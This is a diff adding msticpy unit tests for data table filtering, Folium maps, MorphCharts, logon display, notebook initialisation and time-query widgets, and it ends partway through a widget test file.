+    _get_cols_from_df,
+)
+
+from ..unit_test_lib import TEST_DATA_PATH
+
+__author__ = "Ian Hellen"
+
+# pylint: disable=redefined-outer-name, protected-access
+
+
+@pytest.fixture(scope="module")
+def dataframe():
+    """Get dataframe and columns."""
+    df_path = Path(TEST_DATA_PATH).joinpath("host_logons.csv")
+    return pd.read_csv(
+        str(df_path),
+        index_col=0,
+        parse_dates=["TimeGenerated"],
+        infer_datetime_format=True,
+    )
+
+
+def _apply_filter(control, column, oper, value, not_true=False):
+    control._col_select.value = column
+    check.equal(column, control.current_col)
+    control._oper_sel.value = oper
+    control._filter_value.value = value
+    control._not_cb.value = not_true
+    control._add_filter(btn=None)
+
+
+def test_data_viewer(dataframe):
+    """Test DataView functions."""
+    dt_viewer = DataViewer(data=dataframe)
+
+    check.equal(len(dataframe), len(dt_viewer.filtered_data))
+    _apply_filter(dt_viewer.data_filter, "Account", "contains", "MSTICAlertsWin1")
+    dt_viewer._apply_filter(btn=None)
+    check.equal(3, len(dt_viewer.filtered_data))
+
+    col_subset = list(dataframe.columns)[:5]
+    dt_viewer.column_chooser = DataTableColumnChooser(
+        data=dataframe, selected_cols=col_subset
+    )
+    dt_viewer._update_columns(btn=None)
+
+    check.equal((3, 5), dt_viewer.filtered_data.shape)
+
+
+def test_datatable_filter(dataframe):
+    """Test basic data table filter functionality."""
+    dt_filter = DataTableFilter(data=dataframe)
+    for col in dataframe.columns:
+        check.is_in(col, dt_filter._col_select.options)
+
+    check.is_instance(dt_filter.filtered_dataframe, pd.DataFrame)
+    check.equal(len(dataframe), len(dt_filter.filtered_dataframe))
+
+    dt_filter._col_select.value = "Account"
+    check.equal("Account", dt_filter.current_col)
+    for oper in dt_filter._OPERATORS["string"]:
+        check.is_in(oper, dt_filter._oper_sel.options)
+    dt_filter._oper_sel.value = "contains"
+    dt_filter._filter_value.value = "MSTICAlertsWin1"
+    dt_filter._add_filter(btn=None)
+
+    check.equal(1, len(dt_filter._curr_filters.options))
+    check.equal(3, len(dt_filter.filtered_dataframe))
+
+    dt_filter._col_select.value = "EventID"
+    for oper in dt_filter._OPERATORS["other"]:
+        check.is_in(oper, dt_filter._oper_sel.options)
+    dt_filter._oper_sel.value = "=="
+    dt_filter._filter_value.value = "4624"
+    dt_filter._add_filter(btn=None)
+
+    check.equal(2, len(dt_filter._curr_filters.options))
+    check.equal(3, len(dt_filter.filtered_dataframe))
+
+    check.equal(len(dataframe), len(dt_filter.bool_filters))
+
+    dt_filter._curr_filters.value = dt_filter._curr_filters.options[0]
+    dt_filter._col_select.value = "Account"
+    dt_filter._oper_sel.value = "contains"
+    dt_filter._filter_value.value = "SYSTEM"
+    dt_filter._update_filter(btn=None)
+    check.equal(2, len(dt_filter._curr_filters.options))
+    check.equal(len(dataframe) - 3, len(dt_filter.filtered_dataframe))
+
+    dt_filter._curr_filters.value = dt_filter._curr_filters.options[1]
+    dt_filter._del_filter(btn=None)
+    check.equal(1, len(dt_filter._curr_filters.options))
+    check.equal(len(dataframe), len(dt_filter.filtered_dataframe))
+
+    dt_filter._clear_filters(btn=None)
+    check.equal(0, len(dt_filter._curr_filters.options))
+    check.equal(len(dataframe), len(dt_filter.filtered_dataframe))
+
+
+_FILTER_DEFS = [
+    pytest.param("Account", False, "query", "EventID == 4624", 14, id="query"),
+    pytest.param("Account", False, "==", "MSTICAlertsWin1\\MSTICAdmin", 2, id="str_eq"),
+    pytest.param("Account", False, "matches", ".*Win1.*", 3, id="matches"),
+    pytest.param("Account", False, "contains", "Win1", 3, id="contains"),
+    pytest.param("TargetUserName", False, "in", "adm1nistrator, Something", 1, id="in"),
+    pytest.param("EventID", False, "==", "4624", 14, id="num_eq"),
+    pytest.param("EventID", False, ">", "4623", 14, id="gt"),
+    pytest.param("EventID", False, "<", "4624", 0, id="lt"),
+    pytest.param("EventID", False, ">=", "4624", 14, id="gte"),
+    pytest.param("EventID", False, "<=", "4624", 14, id="lte"),
+    pytest.param("EventID", False, "in", "4624, 4625", 14, id="num_in"),
+    pytest.param("EventID", False, "between", "4623, 4625", 14, id="num_between"),
+    pytest.param(
+        "TimeGenerated", False, "<", datetime.utcnow().isoformat(), 14, id="date_lt"
+    ),
+    pytest.param(
+        "EventID",
+        False,
+        "between",
+        "4623, 4625, 4626",
+        ValueError,
+        id="fail_num_between",
+    ),
+    pytest.param("Account", False, ">", "ZZZZ", TraitError, id="str_gt"),
+    pytest.param(
+        "Account", True, "==", "MSTICAlertsWin1\\MSTICAdmin", 12, id="not_str_eq"
+    ),
+    pytest.param("Account", True, "matches", ".*Win1.*", 11, id="not_matches"),
+    pytest.param("EventID", True, "==", "4624", 0, id="not_num_eq"),
+    pytest.param("EventID", True, ">", "4623", 0, id="not_gt"),
+    pytest.param("EventID", True, "between", "4623, 4625", 0, id="not_num_in"),
+]
+
+
+@pytest.mark.parametrize("col, not_true, oper, expr, result", _FILTER_DEFS)
+def test_datatable_types(dataframe, col, not_true, oper, expr, result):
+    """Check filter handling of different col types and operators."""
+    dt_filter = DataTableFilter(data=dataframe)
+    if isinstance(result, type) and issubclass(result, Exception):
+        data = None
+        with pytest.raises(result):
+            _apply_filter(dt_filter, col, oper, expr, not_true)
+            data = dt_filter.filtered_dataframe
+        check.is_none(data)
+    else:
+        _apply_filter(dt_filter, col, oper, expr, not_true)
+        check.equal(result, len(dt_filter.filtered_dataframe))
+
+
+def test_datatable_column_chooser(dataframe):
+    """Test basic data column chooser functionality."""
+    dt_col = DataTableColumnChooser(data=dataframe)
+    check.equal(len(dataframe.columns), len(dt_col.datatable_columns))
+    for col in dataframe.columns:
+        check.is_in(col, dt_col.dataframe_columns)
+
+    col_subset = list(dataframe.columns)[:5]
+    dt_col = DataTableColumnChooser(data=dataframe, selected_cols=col_subset)
+    check.equal(len(col_subset), len(dt_col.datatable_columns))
+    for col in col_subset:
+        check.is_in(col, dt_col.dataframe_columns)
+
+
+def test_get_cols_from_df(dataframe):
+    """Test creating bokeh columns from dataframe."""
+    col_dict = _get_cols_from_df(dataframe)
+    check.equal(len(dataframe.columns), len(col_dict))
+    check.is_instance(col_dict["TimeGenerated"].formatter, DateFormatter)
diff --git a/tests/nbtools/test_folium.py b/tests/nbtools/test_folium.py
new file mode 100644
index 000000000..01a09e8ae
--- /dev/null
+++ b/tests/nbtools/test_folium.py
@@ -0,0 +1,195 @@
+# -------------------------------------------------------------------------
+# Copyright (c) Microsoft Corporation. All rights reserved.
+# Licensed under the MIT License. See License.txt in the project root for
+# license information.
+# --------------------------------------------------------------------------
+"""Unit tests for Folium wrapper."""
+import math
+import os
+import unittest
+from pathlib import Path
+
+import folium
+import nbformat
+import pandas as pd
+import pytest
+from nbconvert.preprocessors import CellExecutionError, ExecutePreprocessor
+
+from msticpy.datamodel.entities import GeoLocation, Host, IpAddress
+from msticpy.nbtools.foliummap import (
+    FoliumMap,
+    get_center_geo_locs,
+    get_center_ip_entities,
+    get_map_center,
+)
+
+from ..unit_test_lib import TEST_DATA_PATH
+
+_NB_FOLDER = "docs/notebooks"
+_NB_NAME = "FoliumMap.ipynb"
+
+
+class TestFoliumMap(unittest.TestCase):
+    """Unit test class."""
+
+    def test_folium_map(self):
+        """Test folium map component."""
+        # Read in some data
+        ip_locs_file = Path(TEST_DATA_PATH).joinpath("ip_locs.csv")
+        geo_loc_df = pd.read_csv(ip_locs_file, index_col=0)
+
+        # Create IP and GeoLocation Entities from the dataframe
+        geo_locs = list(geo_loc_df.apply(create_geo_entity, axis=1).values)
+        ip_entities = list(geo_loc_df.apply(create_ip_entity, axis=1).values)
+
+        folium_map = FoliumMap(
+            width="50%", height="50%", location=(47.5982328, -122.331), zoom_start=14
+        )
+        self.assertIsInstance(folium_map.folium_map, folium.Map)
+
+        for ip in ip_entities:
+            ip.AdditionalData.update({"name": "test", "role": "testrole"})
+        folium_map = FoliumMap(zoom_start=9)
+        folium_map.add_ip_cluster(ip_entities=ip_entities, color="orange")
+        ip_entities_clean = [
+            ip
+            for ip in ip_entities
+            if ip.Location
+            and ip.Location.Latitude
+            and not math.isnan(ip.Location.Latitude)
+            and not math.isnan(ip.Location.Longitude)
+        ]
+        self.assertEqual(len(ip_entities_clean), len(folium_map.locations))
+
+        folium_map.add_ip_cluster(ip_entities=ip_entities_clean)
+        folium_map.center_map()
+
+        folium_map.add_geoloc_cluster(geo_locations=geo_locs, color="orange")
+        self.assertEqual(len(ip_entities_clean) * 3, len(folium_map.locations))
+
+        geo_tuples = geo_loc_df.apply(
+            lambda x: (x.Latitude, x.Longitude), axis=1
+        ).values
+        folium_map.add_locations(locations=geo_tuples, color="orange")
+        self.assertEqual(len(ip_entities_clean) * 4, len(folium_map.locations))
+
+    def test_centering_algorithms(self):
+        """Test centering algorithms."""
+        ip_locs_file = Path(TEST_DATA_PATH).joinpath("ip_locs.csv")
+        geo_loc_df = pd.read_csv(ip_locs_file, index_col=0)
+        geo_locs = list(geo_loc_df.apply(create_geo_entity, axis=1).values)
+        ip_entities = list(geo_loc_df.apply(create_ip_entity, axis=1).values)
+
+        center = get_center_geo_locs(geo_locs)
+        self.assertAlmostEqual(center[0], 38.7095)
+        self.assertAlmostEqual(center[1], -93.6112)
+        center = get_center_geo_locs(geo_locs, mode="mean")
+        self.assertAlmostEqual(center[0], 39.847162352941176)
+        self.assertAlmostEqual(center[1], -87.36079411764706)
+        center = get_center_ip_entities(ip_entities)
+        self.assertAlmostEqual(center[0], 38.7095)
+        self.assertAlmostEqual(center[1], -93.6112)
+        hosts = []
+        for ip in ip_entities:
+            new_host = Host(HostName=ip.Address)
+            new_host.ip = ip
+            hosts.append(new_host)
+
+        center = get_map_center(entities=hosts)
+        self.assertAlmostEqual(center[0], 39.847162352941176)
+        self.assertAlmostEqual(center[1], -87.36079411764706)
+
+    def test_marker_clustering(self):
+        """Test marker clustering."""
+        folium_map = FoliumMap(zoom_start=5)
+        locations = [
+            (47.5982328, -122.331),
+            (49.278431, -123.112679),
+            (37.776718, -122.416733),
+        ]
+
+        folium_map.create_new_cluster_with_locations(
+            locations=locations, name="Microsoft Campuses"
+        )
+
+        self.assertEqual(len(locations), len(folium_map.locations))
+
+    def test_subgroups(self):
+        """Test subgroups."""
+        folium_map = FoliumMap(zoom_start=5)
+        marker_cluster = folium_map.create_marker_cluster(name="All Campuses")
+
+        clusters = [marker_cluster]
+
+        folium_map.add_marker_clusters(clusters=clusters)
+
+        subgroup_us = folium_map.create_feature_sub_group_of_marker_cluster(
+            cluster=marker_cluster, name="US Campuses"
+        )
+        subgroup_ca = folium_map.create_feature_sub_group_of_marker_cluster(
+            cluster=marker_cluster, name="Canadian Campuses"
+        )
+
+        locations_us = [(47.5982328, -122.331), (37.776718, -122.416733)]
+        locations_ca = [(49.278431, -123.112679)]
+
+        folium_map.add_locations_to_feature_subgroup(
+            locations=locations_us, subgroup=subgroup_us, color="blue"
+        )
+        folium_map.add_locations_to_feature_subgroup(
+            locations=locations_ca, subgroup=subgroup_ca, color="red"
+        )
+
+        self.assertEqual(
+            len(locations_us) + len(locations_ca), len(folium_map.locations)
+        )
+
+    def test_geohash(self):
+        """Test geohash."""
+        folium_map = FoliumMap(zoom_start=5)
+        geohashes = ["c23n8", "c2b2q"]
+
+        folium_map.create_new_cluster_with_geohashes(
+            geohashes=geohashes, name="Microsoft Campuses"
+        )
+
+        self.assertEqual(len(geohashes), len(folium_map.locations))
+
+    @pytest.mark.skipif(
+        not os.environ.get("MSTICPY_TEST_NOSKIP"), reason="Skipped for local tests."
+    )
+    def test_folium_map_notebook(self):
+        """Run folium notebook."""
+        nb_path = Path(_NB_FOLDER).joinpath(_NB_NAME)
+        abs_path = Path(_NB_FOLDER).absolute()
+        with open(nb_path, encoding="utf-8") as f:
+            nb = nbformat.read(f, as_version=4)
+        ep = ExecutePreprocessor(timeout=600, kernel_name="python3")
+
+        try:
+            ep.preprocess(nb, {"metadata": {"path": abs_path}})
+        except CellExecutionError:
+            nb_err = str(nb_path).replace(".ipynb", "-err.ipynb")
+            msg = f"Error executing the notebook '{nb_path}'.\n"
+            msg += f"See notebook '{nb_err}' for the traceback."
+            print(msg)
+            with open(nb_err, mode="w", encoding="utf-8") as f:
+                nbformat.write(nb, f)
+            raise
+
+
+def create_ip_entity(row):
+    """Return IP entity - test helper."""
+    ip_ent = IpAddress(Address=row["AllExtIPs"])
+    geo_loc = create_geo_entity(row)
+    ip_ent.Location = geo_loc
+    return ip_ent
+
+
+def create_geo_entity(row):
+    """Return GeoLocation entity - test helper."""
+    # get subset of fields for GeoLocation
+    loc_props = row[
+        ["CountryCode", "CountryName", "State", "City", "Longitude", "Latitude"]
+    ]
+    return GeoLocation(**loc_props.to_dict())
diff --git a/tests/nbtools/test_morph_charts.py b/tests/nbtools/test_morph_charts.py
new file mode 100644
index 000000000..bbbf0cb21
--- /dev/null
+++ b/tests/nbtools/test_morph_charts.py
@@ -0,0 +1,87 @@
+# -------------------------------------------------------------------------
+# Copyright (c) Microsoft Corporation. All rights reserved.
+# Licensed under the MIT License. See License.txt in the project root for
+# license information.
+# --------------------------------------------------------------------------
+"""morph_charts test class."""
+import os
+from pathlib import Path
+from unittest.mock import patch, call
+
+import pytest
+import IPython
+import pandas as pd
+
+from msticpy.common.exceptions import MsticpyException
+from msticpy.nbtools.morph_charts import MorphCharts
+
+from ..unit_test_lib import get_test_data_path
+
+_TEST_DATA = get_test_data_path()
+
+test_morph = MorphCharts()
+
+
+class TestMorph:
+    """Pytest test class."""
+
+    @patch("builtins.print")
+    def test_chart_details(self, mocked_print):
+        with pytest.raises(KeyError):
+            assert test_morph.get_chart_details("xxx")
+        test_morph.get_chart_details("SigninsChart")
+        assert mocked_print.mock_calls == [
+            call(
+                "SigninsChart",
+                ":",
+                "\n",
+                "Charts for visualizing Azure AD Signin Logs.",
+                "\n",
+                "Query: ",
+                "Azure.list_all_signins_geo",
+            )
+        ]
+
+    @patch("builtins.print")
+    def test_list_charts(self, mocked_print):
+        test_morph.list_charts()
+        assert mocked_print.mock_calls == [call("SigninsChart")]
+
+    @patch("builtins.print")
+    def test_search_charts_f(self, mocked_print):
+        test_morph.search_charts("testing")
+        assert mocked_print.mock_calls == [call("No matching charts found")]
+
+    @patch("builtins.print")
+    def test_search_charts_s(self, mocked_print):
+        test_morph.search_charts("signinLogs")
+        assert mocked_print.mock_calls == [
+            call(
+                "SigninsChart",
+                ":",
+                "\n",
+                "Charts for visualizing Azure AD Signin Logs.",
+            )
+        ]
+
+    def test_display(self):
+        test_file = Path(_TEST_DATA).joinpath("morph_test.csv")
+        test_data = pd.read_csv(test_file, index_col=0)
+        output = test_morph.display(data=test_data, chart_name="SigninsChart")
+        assert isinstance(output, IPython.lib.display.IFrame)
+        assert os.path.isdir(Path.cwd().joinpath("morphchart_package")) is True
+        assert (
+            os.path.isfile(
+                Path.cwd().joinpath(*["morphchart_package", "description.json"])
+            )
+            is True
+        )
+        assert (
+            os.path.isfile(
+                Path.cwd().joinpath(*["morphchart_package", "query_data.csv"])
+            )
+            is True
+        )
+        with pytest.raises(MsticpyException):
+            assert test_morph.display(data=test_data, chart_name="test")
+            assert test_morph.display(data="test_data", chart_name="SigninsChart")
diff --git a/tests/nbtools/test_nbdisplay.py b/tests/nbtools/test_nbdisplay.py
new file mode 100644
index 000000000..35d8922e4
--- /dev/null
+++ b/tests/nbtools/test_nbdisplay.py
@@ -0,0 +1,59 @@
+# -------------------------------------------------------------------------
+# Copyright (c) Microsoft Corporation. All rights reserved.
+# Licensed under the MIT License. See License.txt in the project root for
+# license information.
+# --------------------------------------------------------------------------
+import os
+import unittest
+from pathlib import Path
+
+import nbformat
+import pandas as pd
+import pytest
+import pytest_check as check
+from nbconvert.preprocessors import CellExecutionError, ExecutePreprocessor
+
+from msticpy.nbtools.nbdisplay import display_logon_data
+
+from ..unit_test_lib import get_test_data_path
+
+_NB_FOLDER = "docs/notebooks"
+_NB_NAME = "EventClustering.ipynb"
+
+
+class Testnbdisplay(unittest.TestCase):
+    """Unit test class."""
+
+    @pytest.mark.skipif(
+        not os.environ.get("MSTICPY_TEST_NOSKIP"), reason="Skipped for local tests."
+    )
+    def test_clustering_nbdisplay_notebook(self):
+        nb_path = Path(_NB_FOLDER).joinpath(_NB_NAME)
+        abs_path = Path(_NB_FOLDER).absolute()
+        with open(nb_path) as f:
+            nb = nbformat.read(f, as_version=4)
+        ep = ExecutePreprocessor(timeout=600, kernel_name="python3")
+
+        try:
+            ep.preprocess(nb, {"metadata": {"path": abs_path}})
+        except CellExecutionError:
+            nb_err = str(nb_path).replace(".ipynb", "-err.ipynb")
+            msg = f"Error executing the notebook '{nb_path}'.\n"
+            msg += f"See notebook '{nb_err}' for the traceback."
+            print(msg)
+            with open(nb_err, mode="w", encoding="utf-8") as f:
+                nbformat.write(nb, f)
+            raise
+
+
+def test_display_logon():
+    """Test Logon display code."""
+    win_logon_df = pd.read_csv(
+        str(get_test_data_path().joinpath("host_logons.csv")),
+        index_col=0,
+        parse_dates=["TimeGenerated"],
+    )
+
+    check.is_not_none(win_logon_df)
+    display_logon_data(win_logon_df)
+    display_logon_data(win_logon_df.iloc[0])
diff --git a/tests/nbtools/test_nbinit.py b/tests/nbtools/test_nbinit.py
new file mode 100644
index 000000000..714d983d5
--- /dev/null
+++ b/tests/nbtools/test_nbinit.py
@@ -0,0 +1,261 @@
+# -------------------------------------------------------------------------
+# Copyright (c) Microsoft Corporation. All rights reserved.
+# Licensed under the MIT License. See License.txt in the project root for
+# license information.
+# --------------------------------------------------------------------------
+"""test nb_init links."""
+import datetime
+import os
+import subprocess  # nosec
+from collections import namedtuple
+from datetime import timedelta
+from enum import Enum
+from pathlib import Path
+
+import pandas as pd
+import pytest
+import pytest_check as check
+from msticpy.nbtools.nbinit import _get_or_create_config, _imp_module_all, init_notebook
+
+from ..unit_test_lib import TEST_DATA_PATH, custom_mp_config
+
+
+def test_nbinit_no_params():
+    """Test init_notebook defaults."""
+    ns_dict = {}
+    init_notebook(
+        namespace=ns_dict,
+        def_imports="nb",
+        verbose=True,
+    )
+
+    check.is_in("pd", ns_dict)
+    check.is_in("get_ipython", ns_dict)
+    check.is_in("Path", ns_dict)
+    check.is_in("np", ns_dict)
+
+    print(ns_dict.keys())
+    # Note - msticpy imports throw when exec'd from unit test
+    # e.g. check.is_in("QueryProvider", ns_dict) fails
+
+    check.is_in("WIDGET_DEFAULTS", ns_dict)
+
+    check.equal(ns_dict["pd"].__name__, "pandas")
+    check.equal(ns_dict["np"].__name__, "numpy")
+
+    check.equal(pd.get_option("display.max_columns"), 50)
+
+
+def test_nbinit_imports():
+    """Test custom imports."""
+    ns_dict = {}
+    init_notebook(
+        namespace=ns_dict,
+        extra_imports=["pathlib", "datetime, time", "datetime, timedelta, tdelta"],
+        def_imports="nb",
+        verbose=True,
+    )
+    print(ns_dict.keys())
+
+    check.is_in("pathlib", ns_dict)
+    check.is_in("time", ns_dict)
+    check.is_in("tdelta", ns_dict)
+    check.is_in("np", ns_dict)
+
+    check.equal(timedelta, ns_dict["tdelta"])
+    check.equal(datetime.time, ns_dict["time"])
+
+
+def test_import_all():
+    """Test import all function."""
+    ns_dict = {}
+    _imp_module_all(ns_dict, module_name="datetime")
+
+    for imp in ["date", "datetime", "time", "timedelta", "timezone", "tzinfo"]:
+        check.is_in(imp, ns_dict)
+
+
+class TestSubdir(Enum):
+    """Test enumeration for config folder."""
+
+    NONE = 0
+    MAIN_ENV_PTR = 1
+    SAME_DIR = 2
+    SEARCH = 3
+
+
+_CONFIG_TESTS = [
+    (("missing_file", None, TestSubdir.NONE), False),
+    (
+        ("msticpyconfig.yaml", None, TestSubdir.MAIN_ENV_PTR),
+        True,
+    ),
+    (
+        (
+            "msticpyconfig-noAzSentSettings.yaml",
+            None,
+            TestSubdir.MAIN_ENV_PTR,
+        ),
+        False,
+    ),
+    (
+        ("msticpyconfig-no-settings.yaml", None, TestSubdir.MAIN_ENV_PTR),
+        False,
+    ),
+    (
+        ("msticpyconfig.yaml", None, TestSubdir.SAME_DIR),
+        True,
+    ),
+    (
+        ("msticpyconfig-noAzSentSettings.yaml", None, TestSubdir.SAME_DIR),
+        False,
+    ),
+    (
+        ("msticpyconfig-no-settings.yaml", None, TestSubdir.SAME_DIR),
+        False,
+    ),
+    (
+        (None, "config.json", TestSubdir.SAME_DIR),
+        True,
+    ),
+    (
+        (None, "config.json", TestSubdir.SEARCH),
+        True,
+    ),
+    (
+        ("msticpyconfig.yaml", None, TestSubdir.SEARCH),
+        True,
+    ),
+    (
+        ("msticpyconfig-no-settings.yaml", None, TestSubdir.SEARCH),
+        False,
+    ),
+    (
+        (
+            "msticpyconfig-noAzSentSettings.yaml",
+            "config.json",
+            TestSubdir.MAIN_ENV_PTR,
+        ),
+        True,
+    ),
+    (
+        ("msticpyconfig-no-settings.yaml", "config.json", TestSubdir.MAIN_ENV_PTR),
+        True,
+    ),
+    (
+        (
+            "msticpyconfig-noAzSentSettings.yaml",
+            "config.json",
+            TestSubdir.SAME_DIR,
+        ),
+        True,
+    ),
+    (
+        ("msticpyconfig-no-settings.yaml", "config.json", TestSubdir.SAME_DIR),
+        True,
+    ),
+    (
+        (
+            "msticpyconfig-noAzSentSettings.yaml",
+            "config.json",
+            TestSubdir.SEARCH,
+        ),
+        True,
+    ),
+    (
+        ("msticpyconfig-no-settings.yaml", "config.json", TestSubdir.SEARCH),
+        True,
+    ),
+]
+
+_test_ids = [
+    f"{test[0][0]}/{test[0][1]}-{test[0][2].name} => {'Success' if test[1] else 'Fail'}"
+    for test in _CONFIG_TESTS
+]
+
+
+@pytest.mark.parametrize("conf_file, expected", _CONFIG_TESTS, ids=_test_ids)
+def test_check_config(conf_file, expected, tmp_path):
+    """Test config check."""
+    mpconf_file, conf_json, mp_location = conf_file
+    init_cwd = str(Path(".").absolute())
+    settings_file = "missing_file"
+    for file in tmp_path.parent.glob("config.json"):
+        file.unlink()
+    for file in tmp_path.parent.glob("msticpyconfig.yaml"):
+        file.unlink()
+    try:
+        # If we want to test against config files in isolated directory
+        if mp_location != TestSubdir.NONE:
+            # Read contents of source file
+            for file in (mpconf_file, conf_json):
+                if file is None:
+                    continue
+                tgt_file = Path(TEST_DATA_PATH).joinpath(file).name
+                file_txt = Path(TEST_DATA_PATH).joinpath(file).read_text()
+
+                dest_file = (
+                    "config.json"
+                    if tgt_file.endswith(".json")
+                    else "msticpyconfig.yaml"
+                )
+                # write the file to the folder
+                tmp_path.joinpath(dest_file).write_text(file_txt)
+            cwd_path = str(tmp_path)
+            # If sub-dir, change to the directory, so WorkspaceConfig has to search.
+            if mp_location in (TestSubdir.MAIN_ENV_PTR, TestSubdir.SEARCH):
+                cwd_path = tmp_path.joinpath("sub_folder")
+                cwd_path.mkdir(parents=True, exist_ok=True)
+            os.chdir(str(cwd_path))
+            if mp_location == TestSubdir.SEARCH or mpconf_file is None:
+                # Pass non-existing file to custom_mp_config to bypass default settings
+                settings_file = "missing_file"
+            else:
+                settings_file = tmp_path.joinpath(mpconf_file)
+        else:
+            os.chdir(str(tmp_path))
+
+        with custom_mp_config(settings_file, path_check=False):
+            result = _get_or_create_config()
+
+            print("result=", result)
+            # print("errs=", "\n".join(errs) if errs else "no errors")
+            # print("warnings=", "\n".join(warns) if warns else "no warnings")
+            check.equal(result, expected, "Result")
+            # reported_errs = 0 if not errs else len(errs)
+            # reported_warns = 0 if not warns else len(warns)
+            # if isinstance(expected.errs, tuple):
+            #     check.is_in(reported_errs, expected.errs, "Num errors")
+            # else:
+            #     check.equal(reported_errs, expected.errs, "Num errors")
+            # if isinstance(expected.wrns, tuple):
+            #     check.is_in(reported_warns, expected.wrns, "Num errors")
+            # else:
+            #     check.equal(reported_warns, expected.wrns, "Num warnings")
+    finally:
+        os.chdir(init_cwd)
+
+
+def test_install_pkgs():
+    """Test installing and importing a package."""
+    test_pkg = "pip_install_test"
+    test_imp = "pip_install_test, , test_pkg_import"
+
+    # Uninstall package if it is already there
+    subprocess.run(["pip", "uninstall", "-y", test_pkg], check=True)  # nosec
+
+    ns_dict = {}
+    init_notebook(
+        namespace=ns_dict,
+        additional_packages=[test_pkg],
+        def_imports="nb",
+        extra_imports=test_imp,
+        verbose=True,
+    )
+
+    for name, obj in ns_dict.items():
+        print(name, type(obj))
+    check.is_in("test_pkg_import", ns_dict)
+    print(ns_dict)
+
+    subprocess.run(["pip", "uninstall", "-y", test_pkg], check=True)  # nosec
diff --git a/tests/nbtools/test_nbwidgets.py b/tests/nbtools/test_nbwidgets.py
new file mode 100644
index 000000000..4f28858db
--- /dev/null
+++ b/tests/nbtools/test_nbwidgets.py
@@ -0,0 +1,284 @@
+# -------------------------------------------------------------------------
+# Copyright (c) Microsoft Corporation. All rights reserved.
+# Licensed under the MIT License. See License.txt in the project root for
+# license information.
+# --------------------------------------------------------------------------
+"""Test module for nbwidgets."""
+from datetime import datetime, timedelta
+from pathlib import Path
+
+import ipywidgets as widgets
+import nbformat
+from nbconvert.preprocessors import ExecutePreprocessor, CellExecutionError
+import pytest
+import pytest_check as check
+
+from msticpy.common.timespan import TimeSpan
+from msticpy.nbtools import nbwidgets as nbw
+from msticpy.nbtools.nbwidgets.core import parse_time_unit, default_max_buffer, TimeUnit
+
+__author__ = "Ian Hellen"
+
+# pylint: disable=redefined-outer-name, protected-access
+
+
+_PARSE_TIME_UNIT_TESTS = [
+    ("minute", TimeUnit.MINUTE),
+    ("hour", TimeUnit.HOUR),
+    ("second", TimeUnit.SECOND),
+    ("day", TimeUnit.DAY),
+    ("week", TimeUnit.WEEK),
+    ("not_known", TimeUnit.MINUTE),
+]
+
+
+def ptu_ids(tests):
+    """Return IDs for parse time unit tests."""
+    return [item[0] for item in tests]
+
+
+@pytest.mark.parametrize(
+    "test, expected", _PARSE_TIME_UNIT_TESTS, ids=ptu_ids(_PARSE_TIME_UNIT_TESTS)
+)
+def test_parse_time_unit(test, expected):
+    """Parse time unit."""
+    check.equal(parse_time_unit(test), expected)
+
+
+_DEF_MAX_BUFFER_TESTS = [
+    ((40, 3, TimeUnit.MINUTE), 40),
+    ((6, -3, TimeUnit.MINUTE), 12),
+    ((None, 8, TimeUnit.DAY), 32),
+    ((None, 4, TimeUnit.DAY), 28),
+    ((None, 24, TimeUnit.HOUR), 96),
+    ((None, 4, TimeUnit.HOUR), 72),
+    ((None, 24, TimeUnit.WEEK), 96),
+    ((None, 4, TimeUnit.WEEK), 20),
+    ((None, 10.5, TimeUnit.WEEK), 42),
+    ((None, 100, TimeUnit.MINUTE), 400),
+]
+
+
+def _dmb_ids(tests):
+    """Return IDs for default max buffer tests."""
+    return ["-".join(str(sub) for sub in item[0]) for item in tests]
+
+
+@pytest.mark.parametrize(
+    "test, expected", _DEF_MAX_BUFFER_TESTS, ids=_dmb_ids(_DEF_MAX_BUFFER_TESTS)
+)
+def test_default_max_buffer(test, expected):
+    """Test max buffer function."""
+    check.equal(default_max_buffer(*test), expected)
+
+
+_END_TIME = datetime.utcnow()
+_START_TIME = _END_TIME - timedelta(1)
+
+_QT_PARAM_TESTS = [
+    (
+        {"origin_time": _START_TIME},
+        {"_w_origin_dt": _START_TIME.date(), "_w_origin_tm": str(_START_TIME.time())},
+    ),
+    ({"label": "The title"}, {"_label": "The title"}),
+    ({"description": "The title"}, {"_label": "The title"}),
+    ({"before": 1, "after": 1}, {"_w_tm_range": (-1, 1)}),
+    (
+        {"start": _START_TIME, "end": _END_TIME},
+        {"_query_start": _START_TIME, "_query_end": _END_TIME},
+    ),
+    (
+        {"timespan": TimeSpan(start=_START_TIME, end=_END_TIME)},
+        {"_query_start": _START_TIME, "_query_end": _END_TIME},
+    ),
+    (
+        {"max_before": 90, "max_after": 90, "units": "hour"},
+        {"max_before": 90, "max_after": 90},
+    ),
+    ({"units": "hour"}, {"max_before": 72, "max_after": 72, "before": 6, "after": 6}),
+    ({"units": "day"}, {"max_before": 28, "max_after": 28, "before": 1, "after": 1}),
+]
+
+
+def _qtp_ids(tests):
+    """Return IDs for QueryTime params tests."""
+    return ["-".join(item[0].keys()) for item in tests]
+
+
+@pytest.mark.parametrize(
+    "test, expected", _QT_PARAM_TESTS, ids=_qtp_ids(_QT_PARAM_TESTS)
+)
+def test_query_time_params(test, expected):
+    """Test parameters for QueryTime widget."""
+    qt = nbw.QueryTime(**test)
+    for attr_name, attr_value in expected.items():
+        attrib = getattr(qt, attr_name)
+        if isinstance(attrib, widgets.Widget):
+            check.equal(attr_value, getattr(attrib, "value"))
+        else:
+            check.equal(attrib, attr_value)
+
+
+def test_query_time_events():
+    """Test QueryTime events."""
+    qt = nbw.QueryTime(
+        units="day", origin_time=_END_TIME - timedelta(1), end=_END_TIME + timedelta(3)
+    )
+    q_start = qt.start
+    q_end = qt.end
+    qt._w_tm_range.value = (-2, 2)
+
+    check.equal(qt.before, 2)
+    check.equal(qt.after, 2)
+    check.equal(q_start - timedelta(1), qt.start)
+    check.equal(q_end + timedelta(1), qt.end)
+
+    qt._w_time_unit.value = "Hour"
+    check.equal(qt.units, "Hour")
+    check.equal(qt.before, 6)
+    check.equal(qt.after, 6)
+    check.equal(qt.max_before, 72)
+    check.equal(qt.max_after, 72)
+
+    new_origin = _END_TIME + timedelta(1)
+    qt._w_origin_dt.value = new_origin
+    check.equal(qt.origin_time, new_origin)
+    qt._w_origin_tm.value = "invalid time"
+    check.equal(qt.origin_time, new_origin)
+
+
+class _TestSelectAction:
+    """Mock action class."""
+
+    value = "nothing"
+
+    def action(self, value):
+        """Mock action method."""
+        self.value = value
+
+
+_SEL_ITEM_PARAMS = [
+    ({"item_list": ["one", "two", "three"]}, ("one", "two", ("two", "three"))),
+    ({"options": ["one", "two", "three"]}, ("one", "two", ("two", "three"))),
+    (
